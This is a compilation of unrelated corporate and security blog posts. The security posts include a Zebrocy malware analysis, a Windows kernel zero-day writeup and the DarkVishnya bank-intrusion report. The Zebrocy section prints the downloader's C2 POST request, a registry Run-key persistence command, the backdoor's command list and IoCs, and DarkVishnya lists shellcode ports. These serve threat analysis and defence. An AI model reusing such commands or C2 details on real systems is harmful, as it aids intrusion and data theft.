“Our Counter Drone team, primarily ex-military, continually analyse this market to identify those systems which will be of most appropriate use to our clients in the application of both ‘soft’ and ‘hard’ effect counter drone measures. Soft effect measures include intelligence-led threat identification, robust airspace management with commensurate risk management policies and legal procedures. Hard measures are broken down into ‘Detect, Track and Identify’ and ‘Defeat’ which are subject to strict usage restrictions.

“One of the challenges for our clients in all sectors is the need to adopt drone technology always within a disciplined strategy which supports the organisation, ensures security and also ‘future proofs’ what is put in place. The adoption of counter drone technology is no exception and so we would urge those organisations reacting to recent events to take a breath and think strategically.

“As far as criminals or ‘rogue’ drone operators are concerned… they will always exist… but their task will be made much more difficult by an increasingly informed business community, the putting in place of more sophisticated counter drone strategies, the implementation of the forthcoming ‘Drone Bill’ within the UK and the adoption of the new aerial drone Standards which were launched for public and peer group consultation in November 2018 by the International Standards Organisation (ISO). Their deadline for public responses on this consultation is 21 January 2019…only six days away.”

The post “Most Of The World’s Airports And Leading Destinations Remain Vulnerable To Criminal Or Rogue Mayhem”. appeared first on IT Security Guru.

A Zebrocy Go Downloader

Last year at SAS2018 in Cancun, Mexico, “Masha and these Bears” included discussion of a subset of Sofacy activity and malware that we call “Zebrocy”, and predictions for the decline of SPLM/XAgent Sofacy activity coinciding with the acceleration of Zebrocy activity and innovation. Zebrocy was initially introduced as a Sofacy backdoor package in 2015, but the Zebrocy cluster has carved a new approach to malware development and delivery to the world of Sofacy. In line with this approach, we will present more on this Zebrocy innovation and activity playing out at SAS 2019 in Singapore.

Our colleagues at Palo Alto recently posted an analysis of Zebrocy malware. The analysis is good and marked their first detection of a Zebrocy Go variant as October 11, 2018. Because there is much to this cluster, clarifying and adding to the discussion is always productive.

Our original “Zebrocy Innovates – Layered Spearphishing Attachments and Go Downloaders” June 2018 writeup documents the very same downloader, putting the initial deployment of Zebrocy Go downloader activity at May 10, 2018. And while the targeting in the May event was most likely different from the October event, we documented this same Go downloader and same C2 was used to target a Kyrgyzstan organization. Also interesting is that the exact same system was a previous Zebrocy target earlier in 2018. So, knowing that this same activity is being reported on as “new” six months later tells us a bit about the willingness of this group to re-use rare components and infrastructure across different targets.

While they are innovating with additional languages, as we predicted in early 2018, their infrastructure and individual components may have more longevity than predicted. Additionally, at the beginning of 2018, we predicted the volume of Zebrocy activity and innovation will continue to increase, while the more traditional SPLM/XAgent activity will continue to decline. Reporting on SPLM/XAgent certainly has followed this course in 2018 as SPLM/XAgent detections wind down globally, as has Sofacy’s use of this malware from our perspective.

Much of the content below is reprinted from our June document.

The Sofacy subset we identify as “Zebrocy” continues to target Central Asian government related organizations, both in-country and remote locations, along with a new middle eastern diplomatic target. And, as predicted, they continue to build out their malware set with a variety of scripts and managed code. In this case, we see new spearphishing components – an LNK file maintaining powershell scripts and a Go-implemented system information collector/downloader. This is the first time we have observed a well-known APT deploy malware with this compiled, open source language “Go”. There is much continued recent Zebrocy activity using their previously known malware set as well.

Starting in May 2018, Zebrocy spearphished Central Asian government related targets directly with this new Go downloader. For example, the attachment name included one “30-144.arj” compressed archive, an older archiver type handled by 7zip, Rar/WinRAR, and others. Users found “30-144.exe” inside the archive with an altered file icon made to look like the file was a Word document (regardless of the .exe file extension). And in a similar fashion in early June, Zebrocy spearphished over a half-dozen accounts targeting several Central Asian countries’ diplomatic organizations with a similar scheme “2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx”, sending out a more common Zebrocy Delphi downloader.

In other cases, delivery of the new Go downloader was not straightforward. The new Go downloader also was delivered with a new spearphishing object that rolls up multiple layers of LNK file, powershell scripts, base64 encoded content, .docx files and the Go downloader files. The downloader is an unusually large executable at over 1.5mb, written to disk and launched by a powershell script. So the attachment that arrived over email was large.
The powershell script reads the file’s contents from a very large LNK file that was included as an email attachment, and then writes it to disk along with a Word document of the same name. So, launching the downloader is followed with the opening of an identically named decoy word document with “WINWORD.EXE” /n “***\30-276(pril).docx” /o”. The downloader collects a large amount of system information and POSTs it to a known Zebrocy C2, then pulls down known Zebrocy Delphi payload code, launches it, and deletes itself.

We observed previous, somewhat similar spearphishing scenarios with an archive containing .LNK, .docx, and base64 encoded executable code, delivering offensive Finfisher objects in separate intrusion activity clusters. This activity was not Sofacy, but the spearphishing techniques were somewhat similar – the layered powershell script attachment technique is not the same, but not altogether new.

And, it is important to reiterate that these Central Asian government and diplomatic targets are often geolocated remotely. In the list of target geolocations, notice countries like South Korea, the Netherlands, etc. In addition to Zebrocy Go downloader data, this report provides data on various other observed Zebrocy malware and targets over the past three months.

Spreading

Mostly all observed Zebrocy activity involves spearphishing. Spearphish attachments arrive with .rar or .arj extensions. Filename themes include official government correspondence invitations, embassy notes, and other relevant items of interest to diplomatic and government staff. Enclosed objects may be LNK, docx, or exe files.

A decoy PDF that directly targeted a Central Asian nation is included in one of the .arj attachments alongside the Go downloader. The content is titled “Possible joint projects in cooperation with the International Academy of Sciences” and lists multiple potential projects requiring international cooperation with Tajikistan and other countries. This document appears to be a legitimate one that was stolen, created mid-May 2018. While we cannot reprint potentially leaked information publicly, clearly, the document was intended for a Russian-language reader.

Powershell launcher from within LNK

The LNK containing two layers of powershell script and base64 encoded content is an unusual implementation – contents from a couple are listed at the technical appendix. When opened, the script opens the shortcut file it is delivered within (“30-276(pril).docx.lnk”), pulls out the base64 encoded contents (in one case, from byte 3507 to byte 6708744), base64 decodes the content and another layer of the same powershell decoding. This script writes two files to disk as “30-276(pril).exe” and “30-276(pril).docx” and opens both files, leading to the launch of the Go language system information collector/downloader and a decoy Word document.

Go System Information Collector/Downloader

Md5              333d2b9e99b36fb42f9e79a2833fad9c
Sha256         fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e
Size              1.79mb (upx packed – 3.5mb upx unpacked)
CompiledOn Stomped (Wed Dec 31 17:00:00 1969)
Type             PE 32-bit Go executable
Name           30-276(pril).exe

This new Go component not only downloads and executes another Zebrocy component, but it enumerates and collects a fair amount of system data for upload to its C2, prior to downloading and executing any further modules. It simply collects data using the systeminfo utility, and in turn makes a variety of WMI calls.

After collecting system information, the backdoor calls out to POST to its hardcoded C2, in this case a hardcoded IP/Url. Note that the backdoor simply uses the default Go user-agent:
“POST /technet-support/library/online-service-description.php?id_name=345XXXD5
HTTP/1.1
Host: 89.37.226.148
User-Agent: Go-http-client/1.1”

With this POST, the module uploads all of the system information it just gathered with the exhaustive systeminfo utility over http: hostname, date/time, all hardware, hotfix, service and software information.

The module then retrieves the gzip’d, better known Zebrocy dropper over port 80 as part of an encoded jpg file, writes it to disk, and executes from a command line:
“cmd /C c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe”
and adds a run key persistence entry with the system utility reg.exe:
cmd /C “reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d
c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f”

Zebrocy AutoIT Dropper

Md5              3c58ed6913593671666283cb7315dec3
Sha256         96c3700ad639faa85982047e05fbd71c3dfd502b09f9860685498124e7dbaa46
Size              478.5kb (upx-packed)
Compiled     Fri Apr 27 06:40:32 2018
Type             PE32 AutoIT executable
Path, Name  appdata\Identities\{83AF1378-986F-1673-091A-02681FA62C3B}\w32srv.exe

This AutoIT dropper writes out a Delphi payload, consistent with previous behavior going back to November 2015, initially described in our January 2016 report “Zebrocy – Sofacy APT Deploys New Delphi Payload”.

Zebrocy Delphi Payload

Md5               2f83acae57f040ac486eca5890649381
Sha256          f9e96b2a453ff8922b1e858ca2d74156cb7ba5e04b3e936b77254619e6afa4e8
Size               786kb
Compiled       Fri Jun 19 16:22:17 1992 (stomped/altered)
Type              PE32 exe [v4.7.7] Path, Name   c:\ProgramData\Protection\Active\armpro.exe

Interestingly the final payload reverts back to an earlier version [v4.7.7]. A “TURBO” command is missing from this Zebrocy Delphi backdoor command list .
SYS_INFO
SCAN_ALL
SCAN_LIST
DOWNLOAD_DAY
DOWNLOAD_LIST
CREATE_FOLDER
UPLOAD_FILE
FILE_EXECUTE
DELETE_FILES
REG_WRITE_VALUE
REG_READ_VALUE
REG_DELETE_VALUE
REG_GET_KEYS_VALUES
REG_DELETE_KEY
KILL_PROCESS
CONFIG
GET_NETWORK
CMD_EXECUTE
DOWNLOAD_DATE
DELETE_FOLDER
UPLOAD_AND_EXECUTE_FILE
SCREENSHOTS
FILE_EXECUTE
SET_HIDDEN_ATTR
START
STOP
KILL_MYSELF

Infrastructure

Zebrocy backdoors are configured to directly communicate with IP assigned web server hosts over port 80, and apparently the group favors Debian Linux for this part of infrastructure: Apache 2.4.10 running on Debian Linux. A somewhat sloppy approach continues, and the group set up and configured one of the sites with digital certificates using a typical Sofacy-sounding domain that they have not yet registered: “weekpost.org”. Digital certificate details are provided in the appendix.

These “fast setup” VPS servers run in “qhoster[.]com” can be paid for with Webmoney, Bitcoin, Litecoin, Dash, Alfa Click, Qiwi, transfers from Sberbank Rossii, Svyaznoy, Promsvyazbank, and more. Although, it appears that Bitcoin and Dash may be of the most interest to help ensure anonymous transactions. Dataclub provides similar payment methods:

One of the VPS IP addresses (80.255.12[.]252) is hosted in the “afterburst[.]com”/Oxygem range. This service is the odd one out and is unusual because it only supports VISA/major credit cards and Paypal at checkout. If other payment options are provided, they are not a part of the public interface.

Victims and Targeting

Zebrocy Go downloader 2018 targets continue to be Central Asian government foreign policy and administrative related. Some of these organizations are geolocated in-country, or locally, and some are located remotely. In several cases, these same systems have seen multiple artefacts from Zebrocy over the course of 2017 and early 2018:
• Kazakhstan
• Kyrgyzstan
• Azerbaijan
• Tajikistan

Additional recent Zebrocy target geo-locations (targeting various Central Asian/ex-USSR local and remote government locations):
• Qatar
• Ukraine
• Czech Republic
• Mongolia
• Jordan
• Germany
• Belgium
• Iran
• Turkey
• Armenia
• Afghanistan
• South Korea
• Turkmenistan
• Kazakhstan
• Netherlands
• Kuwait
• United Arab Emirates
• Spain
• Poland
• Qatar
• Oman
• Switzerland
• Mongolia
• Kyrgyzstan
• United Kingdom

Attribution

Zebrocy activity is a known subset of Sofacy activity. We predicted that they would continue to innovate within their malware development after observing past behavior, developing with Delphi, AutoIT, .Net C#, Powershell, and now “Go” languages. Their continued targeting, phishing techniques, infrastructure setup, technique and malware innovation, and previously known backdoors help provide strong confidence that this activity continues to be Zebrocy.

Conclusions

Zebrocy continues to maintain a higher level of volume attacking local and remote ex-USSR republic Central Asian targets than other clusters of targeted Sofacy activity. Also interesting with this Sofacy sub-group is the innovation that we continue to see within their malware development. Much of the spearphishing remains thematically the same, but the remote locations of these Central Asian targets are becoming more spread out – South Korea, Netherlands, etc. While their focus has been on Windows users, it seems that we can expect the group to continue making more innovations within their malware set. Perhaps all their components will soon support all OS platforms that their targets may be using, including Linux and MacOS. Zebrocy spearphishing continues to be characteristically higher volume for a targeted attacker, and most likely that trend will continue.
And, as their spearphishing techniques progress to rival Finfisher techniques without requiring zero-day exploitation, perhaps Zebrocy will expand their duplication of more sources of open source spearphishing techniques.

IoC

Go downloader
333d2b9e99b36fb42f9e79a2833fad9c

IPs
80.255.12.252
89.37.226.148
46.183.218.34
185.77.131.110
92.114.92.128

URLs
/technet-support/library/online-service-description.php?id_name=XXXXX
/software-apptication/help-support-apl/getidpolapl.php

File – paths and names
30-276(pril).exe
30-144-(copy).exe
Embassy Note No.259.docx.lnk
2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx

Microsoft at NRF: Delivering on the promise of intelligent retail

A few days from now, retailers from around the world will converge in New York for the National Retail Federation (NRF) Big Show, the world’s largest retail conference. Every year, this event feels like a fresh beginning for retailers; just off their busiest time of year, they’re ready to not only celebrate but also reflect on what went well and improvements for next year. And every year, it feels like the stakes have never been higher – changing consumer demands combined with a retail model that’s constantly in flux creates an urgency to figure out what’s next.

I love coming to NRF. I joined Microsoft about five months ago, but I’m a retailer at heart. I literally grew up in retail, spending weekends at grocery stores with my dad rearranging coffee cans as part of our family business. Later I ran CRM and digital marketing for Gap Inc.’s brands. Now, I’m feeling even closer to retailers today than ever because I’m working for a company committed to building and maintaining retailers’ trust, working together to deliver intelligent solutions that help retailers delight shoppers, empower their employees, transform their supply chains and reimagine their businesses.

Given my retail background, I particularly appreciate Microsoft’s commitment to be a good partner by recognizing that retailers’ customers, employees and data belong to them. We want to put retailers in control of the pieces they need to make their businesses wildly successful for years to come.

So how is Microsoft delivering on that promise?

Bringing customer-first innovation to market

At Microsoft, we look to bring to market products and services that work seamlessly together to help retailers do more and take advantage of the latest technologies like AI, machine learning and IoT across the entire organization. Leading retailers are already using the Microsoft Cloud as a competitive differentiator, from using AI to create transformative customer and employee experiences, to embracing IoT to leverage their supply chains for maximum customer impact, to using cloud-based business applications to manage everything from the customer journey to operations. In an industry experiencing accelerating change, Microsoft and its partners are creating the solutions to help our customers keep up.

Empowering employees with the right tools is an area I think is especially ripe for innovation. For example, Firstline Workers, such as retail associates, are the first point of contact between a company and its customers or products, and are the lifeblood of the retail industry. They represent a retailer’s brand and need better access to resources and expertise to deliver great customer experiences and drive the bottom line. There’s also a huge opportunity to give these employees a more streamlined experience at work by modernizing some of the busy work that takes time away from customer service, such as scheduling and task management.

That is why I’m excited to announce new capabilities in Microsoft Teams for Firstline Workers. A new customizable mobile Teams experience makes it easy for them to connect with anyone in the organization and access just the apps and services they need while on the job. It includes features like the ability to share location and a smart camera.  We are also announcing a new API to connect Teams to workforce management systems so employees no longer need to login to different systems, but can access everything in Teams as a hub for their workday. Finally, a new Praise tool makes it easy for managers and employees to recognize their peers and build a culture of teamwork.

Microsoft built all this innovation to help retail employees and other Firstline Workers get out of the backroom and onto the store floor, interacting with customers, creating great experiences and building loyalty. As always, it all comes back to the customer.

Putting our trusted business model to work for our customers

I’m proud to say retailers are already realizing the value in working with us and our partners to drive success. Just in the past few months, we’ve announced incredible partnerships with some of retail’s biggest names, including Starbucks, Walmart and – one that’s particularly close to my heart – Gap, Inc. And just this week, we announced a partnership with Kroger to power a new connected-experience store pilot and jointly bring digital solutions to market that will empower other retailers to transform their own operations and create their own amazing customer experiences.

For each of these customers, we’re bringing to bear our technology and our brightest retail minds to help them build a foundation for success in this ever-changing market.

We don’t just sell another commodity to retailers. Our superpower is bringing together our global network of partners to work side-by-side with retailers and understand their greatest challenges and opportunities. Together, we go beyond simply finding solutions – we’re redefining categories and establishing new business models. This is how we’re enabling intelligent retail – by offering the best-in-class solutions and industry expertise that’s helping retailers know their customers better, empower their people in new ways, deliver on an intelligent supply chain and reimagine retail.

I’m excited to highlight many other retail brands in our booth at NRF that are working with Microsoft and our partners to embrace intelligent retail:

  • On the heels of this week’s news, I’m excited to showcase Kroger’s Microsoft Azure-powered Retail as a Service (RaaS) offering to NRF attendees. The solutions are not only enabling Kroger to transform the grocery experience for its customers with a personalized guided shopping experience, but are also opening a completely new revenue stream for Kroger, as they partner with us to market the solutions to other retailers. Centered around Kroger’s EDGE Shelf, which uses digital displays instead of traditional paper tags to indicate everything from prices and promotions to nutritional and dietary information, RaaS connects the shelf to the company’s Scan, Bag, Go® to create a unique guided shopping experience for customers.
  • Starbucks is using Azure Sphere within select equipment to enable its partners (employees) more opportunity to engage with customers. This includes everything from beverage consistency, waste reduction, the management of energy consumption and predictive maintenance.
  • Arts and crafts supply store Michaels is working with Microsoft partner TokyWoky to identify potential ambassadors online and leverage their knowledge and expertise to build a digital community of makers. Using Microsoft Azure, Azure AI and Power BI, TokyWoky’s 24/7 chat technology helps retailers like Michaels provide their customers with a human, personalized experience that’s not restricted by the size of its customer service workforce. TokyWoky’s platform encourages customers to assist and answer questions from other customers, all within the Michaels site, resulting in four- to six-times more questions being answered than before. The solution also creates continuous user-generated content across michaels.com, which helps to drive trust and conversion.
  • Goodwill of Central and Northern Arizona (GCNA) partnered with DXC Technology to implement Microsoft Dynamics 365 as its retail management and Point of Sale (POS) solution. DXC’s Dynamics-based solution enables GCNA to collect detailed information on the items it sells. This is combined with category detail on items its stores produce from donated goods (collected from a GCNA proprietary and custom application) to maximize revenue. This is especially important for GCNA, whose revenue directly funds its mission – to empower individuals, strengthen families, and build stronger communities, and move towards its vision – to end poverty through the power of work.
  • Italian luxury lifestyle brand Stefano Ricci is using partner SBSoft’s Dynamics-based CRM4Retail solution to give employees a high-level view of information to help them provide the white-glove experience its shoppers expect. Online, the database produces recommendations based on how customers are navigating the website. The application for stores helps retail employees understand and anticipate customer needs and answer customer questions in a matter of seconds. It also assists in the development of targeted, data-driven campaigns and promotions.
  • Wine and liquor store BevMo! has partnered with Fellow Inc. to use its Fellow Robots to connect supply chain efficiency with customer delight. Delivered using Power BI and powered by Microsoft Azure, Azure AI and Azure Machine Learning, the robot provides perfect product location using image recognition and utilizes suggestive selling to offer customers different types of products and integrate point of sale interactions. A new integration point from Fellow to the “My Retailer app” of each retailer helps customers locate their favorite items in the store and suggests other items the customer may like. BevMo! is also using Microsoft’s intelligent cloud solutions to empower its store associates for better customer service.
  • Retailers such as children’s clothing brand Polarn O Pyret is turning to the Unified Commerce Alliance(UCA) solution – powered by Azure AI and data platform and Dynamics 365 for Retail, in addition to partner-driven solutions from Avensia Storefront, Episerver and InRiver PIM – to help them reimagine retail by joining and sharing data and business logic from different systems and channels through a single, secure and scalable system in the Azure cloud. The UCA cloud solution provides one source of truth across all retail functionality – POS, pricing, campaign, stock and warehouse management. This one-stop shop provides everything a retailer needs to manage all digital store experiences, online and offline.

Connect with us at NRF

Microsoft will have a big presence at NRF including 20 solution demos in our booth, sessions led by our retail experts and tours of our own Microsoft Store to show how Microsoft runs on Microsoft – and if you plan to be there, come see us! Visit us in booth #3301 to experience for yourself the solutions and customer stories I mention above, or attend one of our sessions on the show floor – I’m leading a Big Ideas session where I’ll talk about what we learned over the holiday season and chat with retailers you know and love about how they’re working with Microsoft to create amazing experiences for their customers. In addition, myself and my colleague Alysa Taylor, Corporate Vice President for Business Applications and Industry Marketing, will be one of several “women rocking retail” to participate in The Girls’ Lounge at NRF (Microsoft is also a sponsor!) And don’t miss Chris Capossela, our Chief Marketing Officer, as he leads a session on Tuesday highlighting the importance of brand. And of course, you can visit Microsoft’s NRF page to keep up to date on the latest news developments.

Despite retail’s breakneck rate of change, there’s never been a more exciting time to be a retailer. I’m excited to be a part of it, bringing Microsoft’s solutions and trusted business model to my retail colleagues around the world. And I’m here to tell every retailer: if we don’t have a solution for your business, we – along with our hundreds of global partners – will build it for you. I can’t wait to see what we’ll create together.

 

The post Microsoft at NRF: Delivering on the promise of intelligent retail appeared first on The Official Microsoft Blog.

Zero-day in Windows Kernel Transaction Manager (CVE-2018-8611)

Executive summary

In October 2018, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis led us to uncover a zero-day vulnerability in ntoskrnl.exe. We reported it to Microsoft on October 29, 2018. The company confirmed the vulnerability and assigned it CVE-2018-8611. Microsoft just released a patch, part of its December update, crediting Kaspersky Lab researchers Boris Larin (Oct0xor) and Igor Soumenkov (2igosha) with the discovery.

This is the third consecutive exploited Local Privilege Escalation vulnerability in Windows we discovered this autumn using our technologies. Unlike the previously reported vulnerabilities in win32k.sys (CVE-2018-8589 and CVE-2018-8453), CVE-2018-8611 is an especially dangerous threat – a vulnerability in the Kernel Transaction Manager driver. It can also be used to escape the sandbox in modern web browsers, including Chrome and Edge, since syscall filtering mitigations do not apply to ntoskrnl.exe system calls.

Just like with CVE-2018-8589, we believe this exploit is used by several threat actors including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT we discovered only recently. In addition to this zero-day and CHAINSHOT, SandCat also uses the FinFisher / FinSpy framework.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Automatic Exploit Prevention for endpoint products
  2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic

Brief details – CVE-2018-8611 vulnerability

CVE-2018-8611 is a race condition that is present in the Kernel Transaction Manager due to improper processing of transacted file operations in kernel mode.

This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System call Filtering that is used, among others, in the Microsoft Edge Sandbox and the Win32k Lockdown Policy employed in the Google Chrome Sandbox. Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web-browsers.

We have found multiple builds of exploit for this vulnerability. The latest build includes changes to reflect the latest versions of the Windows OS.

Check for the newest at the moment Windows 10 Redstone 4 Build 17133

A check for the latest build at the time of discovery: Windows 10 Redstone 4 Build 17133

Similarly to CHAINSHOT, this exploit heavily relies on the use of C++ exception handling mechanisms with custom error codes.

To abuse this vulnerability exploit first creates a named pipe and opens it for read and write. Then it creates a pair of new transaction manager objects, resource manager objects, transaction objects and creates a big number of enlistment objects for what we will call “Transaction #2”. Enlistment is a special object that is used for association between a transaction and a resource manager. When the transaction state changes associated resource manager is notified by the KTM. After that it creates one more enlistment object only now it does so for “Transaction #1” and commits all the changes made during this transaction.
After all the initial preparations have been made exploit proceeds to the second part of vulnerability trigger. It creates multiple threads and binds them to a single CPU core. One of created threads calls NtQueryInformationResourceManager in a loop, while second thread tries to execute NtRecoverResourceManager once. But the vulnerability itself is triggered in the third thread. This thread uses a trick of execution NtQueryInformationThread to obtain information on the latest executed syscall for the second thread. Successful execution of NtRecoverResourceManager will mean that race condition has occurred and further execution of WriteFile on previously created named pipe will lead to memory corruption.


Proof of concept: execution of WriteFile with buffer set to 0x41

As always, we provided Microsoft with a proof of concept for this vulnerability, along with source code. And it was later shared through Microsoft Active Protections Program (MAPP).

More information about SandCat, FruityArmor and CVE-2018-8611 is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Announcing the Female Founders Competition winners

Earlier this year, our corporate venture fund, M12, took an important step in helping identify promising women entrepreneurs and accelerating their access to capital. Partnering with EQT Ventures and SVB Financial Group, we launched the Female Founders Competition, awarding $4M to two women-led companies building innovative software solutions for the enterprise.

Those following this industry are well aware of the hard truths women founders face when seeking funding: just 17 percent of all startups boast a single female founder; and of that small percent, only 2.2 percent of total global venture capital funding went to female founders over the past two years. While the numbers clearly indicate there’s a need to do more, many investors struggle with where to start.

There are plenty of women entrepreneurs focused on solving enterprise technology challenges, but we needed a better way of finding them. With the previous success in sourcing incredibly promising portfolio companies from our Innovate.AI competition, we decided to try a competition again, but this time focused on surfacing female founders. And the results spoke volumes.

We received hundreds of submissions from female founders building enterprise solutions that spanned a multitude of industries and countries. This competition, while a small step to shift how we sourced deals, not only showed us that there is more than one way to effectively discover talent and expand networks, but it’s our responsibility as venture capitalists to begin leveling the playing field so those companies receiving funding are a truer reflection of the world in which we live.

Today, it’s my pleasure to share the results of the Female Founders Competition, and the stories behind the two incredible women whose companies will now join our portfolio.

Acerta

Greta Cutulenco, CEO and co-founder of Acerta, began her journey as a software engineering student at the University of Waterloo in Ontario, Canada, where she developed an interest in robotics and autonomous vehicle systems. While working on a research project with Sebastian Fischmeister, a professor at the university, she became fascinated with recent developments in connected and autonomous vehicles, sparking a career that led her to work with and learn from automotive original equipment manufacturers (OEMs) and Tier-1 manufacturers before returning to her roots in research. Cutulenco, Fischmeister and another colleague, Jean-Christophe Petkovich, would go on to create Acerta, using machine learning to provide real-time malfunction detection and failure prediction in vehicles. To commercialize their work, Cutulenco spent time in local incubators and attending business and sales courses before securing Acerta’s participation in the Techstars Mobility accelerator in Detroit. Just over two years later, Acerta has grown from a team of three to nearly 20, with Greta recently being named to Forbes 30 under 30 for Manufacturing and Industry, the company gaining traction with some of the largest auto manufacturers as customers, and now becoming a winner of the Female Founders competition.

“We are thrilled for the opportunity to work with M12, EQT Ventures, and SVB Financial Group,” said Cutulenco. “The funding and ongoing support will bring a big boost to the company’s long-term growth.”

 Greta Cutulenco, CEO and co-founder of Acerta

Greta Cutulenco, CEO and co-founder of Acerta

Mental Canvas

Julie Dorsey, founder and chief scientist of Mental Canvas, trained as an architect before becoming a world-class computer scientist specializing in computer graphics. Her appreciation for, and expertise in these two disciplines inspired her to create the core technology behind Mental Canvas, which reimagines sketch for the digital age by augmenting it with spatial strokes, 3D navigation, and free-form animations. As supported by its early customers, Mental Canvas is a platform that addresses a wide and varied market, with early customers spanning a variety of industries from architecture, concept development for movies, animation and games, product design, education, and scientific illustration. Dorsey is also a professor of computer science at Yale University, and previously was on the faculty at MIT, where she held tenured appointments in the departments of Electrical Engineering & Computer Science and Architecture. She is an inventor on more than a dozen awarded and four pending patents, and for the past two years, has devoted herself full-time to her vision of enhancing visual communication by fundamentally elevating the way people draw.

“It is a great honor to be recognized in this way,” said Dorsey. “Of course, we are pleased with the funding, but even more, we are thrilled by the recognition and affirmation this prize provides. It says to me and our team that the technology Mental Canvas is developing to bring sketch into the digital age is groundbreaking and impactful. We look forward to working with M12, EQT Ventures and SVB Financial Group to make our company’s vision a reality.”

Julie Dorsey, founder and chief scientist of Mental Canvas

Julie Dorsey, founder and chief scientist of Mental Canvas

This afternoon, I’ll join the next generation of female leaders at a forum focused on building and nurturing this community and preparing them for what’s next. While it’s a great way to welcome our winners to the M12 portfolio, it’s also an opportunity to continue this journey – one that is very personal to me – of doing our part to ensure that everyone has a seat at the table.

 

The post Announcing the Female Founders Competition winners appeared first on The Official Microsoft Blog.

DarkVishnya: Banks attacked through direct connection to local network

While novice attackers, imitating the protagonists of the U.S. drama Mr. Robot, leave USB flash drives lying around parking lots in the hope that an employee from the target company picks one up and plugs it in at the workplace, more experienced cybercriminals prefer not to rely on chance. In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company’s local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization’s building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.

High-tech tables with sockets are great for planting hidden devices

High-tech tables with sockets are great for planting hidden devices

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals’ abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. To overcome the firewall restrictions, they planted shellcodes with local TCP servers. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels.

Having succeeded, the cybercriminals proceeded to stage three. Here they logged into the target system and used remote access software to retain access. Next, malicious services created using msfvenom were started on the compromised computer. Because the hackers used fileless attacks and PowerShell, they were able to avoid whitelisting technologies and domain policies. If they encountered a whitelisting that could not be bypassed, or PowerShell was blocked on the target computer, the cybercriminals used impacket, and winexesvc.exe or psexec.exe to run executable files remotely.

Verdicts

not-a-virus.RemoteAdmin.Win32.DameWare
MEM:Trojan.Win32.Cometer
MEM:Trojan.Win32.Metasploit
Trojan.Multi.GenAutorunReg
HEUR:Trojan.Multi.Powecod
HEUR:Trojan.Win32.Betabanker.gen
not-a-virus:RemoteAdmin.Win64.WinExe
Trojan.Win32.Powershell
PDM:Trojan.Win32.CmdServ
Trojan.Win32.Agent.smbe
HEUR:Trojan.Multi.Powesta.b
HEUR:Trojan.Multi.Runner.j
not-a-virus.RemoteAdmin.Win32.PsExec

Shellcode listeners

tcp://0.0.0.0:5190
tcp://0.0.0.0:7900

Shellcode connects

tcp://10.**.*.***:4444
tcp://10.**.*.**:4445
tcp://10.**.*.**:31337

Shellcode pipes

\\.\xport
\\.\s-pipe

Empowering every developer to achieve more at Microsoft Connect(); 2018

As we share our new innovations for every developer at Connect(); 2018 today, I’m reminded that now, more than ever, we’re moving towards a world of ubiquitous computing where technology is responsible for transforming every consumer and business experience. For developers, the opportunity to use technologies like AI, IoT, serverless compute, containers and more has never been greater. I’m excited to share some of the latest things we’re working on at Microsoft to help developers achieve more when building the applications of tomorrow, today.

Tools for every developer

As a company built by developers and for developers, we understand the opportunities and challenges that developers face every day. Today, we are continuing to deliver developer tools and Azure services that help you be more innovative and productive than ever.

I’m excited to announce the general availability of Azure Machine Learning service, which enables developers and data scientists to efficiently build, train and deploy machine learning models. Using Azure Machine Learning, you can automate model selection and tuning, increase productivity with DevOps for machine learning, and deploy models with one click. With its tool-agnostic Python SDK, Azure Machine Learning service can be used in any Python environment with your favorite open source frameworks.

Over 12 million developers around the world use Visual Studio to build new applications and enhance existing ones. Today, Visual Studio 2019 Preview and Visual Studio 2019 for Mac Preview are available for download. With numerous improvements to capabilities like IntelliCode for AI-assisted IntelliSense, expanded refactoring capabilities and smarter debugging, developers can spend more time focusing on writing code. Developers can now collaborate in real time with Live Share and the new GitHub pull request capabilities. And developers using Azure will find better support than ever, whether you’re modernizing with containers or building cloud-native solutions with serverless technology.

